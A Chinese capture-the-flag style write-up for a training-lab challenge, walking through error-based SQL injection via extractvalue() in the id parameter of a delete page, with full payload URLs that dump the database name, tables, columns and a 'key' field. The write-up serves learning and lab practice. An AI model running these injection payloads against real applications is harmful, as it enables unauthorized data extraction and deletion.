*首先关于报错型注入可以参考一下*文章了解
delecte注入的多种方法
这题我使用的是extractvalue函数
从此可以知道注入点在删除页面的url链接的id参数中,可由报错注入来爆库
1.爆库 (pikaqiu)
http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,(select database())))
2.爆表名(message)
http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,(select group_concat(table_name) from information_schema.tables where table_schema=‘pikaqiu’)))
3.爆字段名
http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,(select group_concat(column_name) from information_schema.columns where table_name=‘message’)))
4.爆字段内容
a.由于报错内容回显只能回显32位,而"~"占了一个字符,所以爆出来的key值是少1位的,知道原因后就有很多处理方法了,可以有right()方法
b.由于key是保留字段,要用单引号括住,否则会报错
c.由于这题是请求删除的url,如果之前你请求id为61~65,因为墨者服务器数据库里面存的key的数据在这个范围(但没精确到是哪个),当前面注入成功的时候也会删除对应id的key内容,导致最后出现爆字段key值的时候,很多评论会有key值为空的情况。如果遇到这种情况,可重启环境再爆字段。
and extractvalue(1,concat(’~’,(select group_concat(key
) from message)))
http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,right((select group_concat(key
) from message),32)))
方法二:sqlmap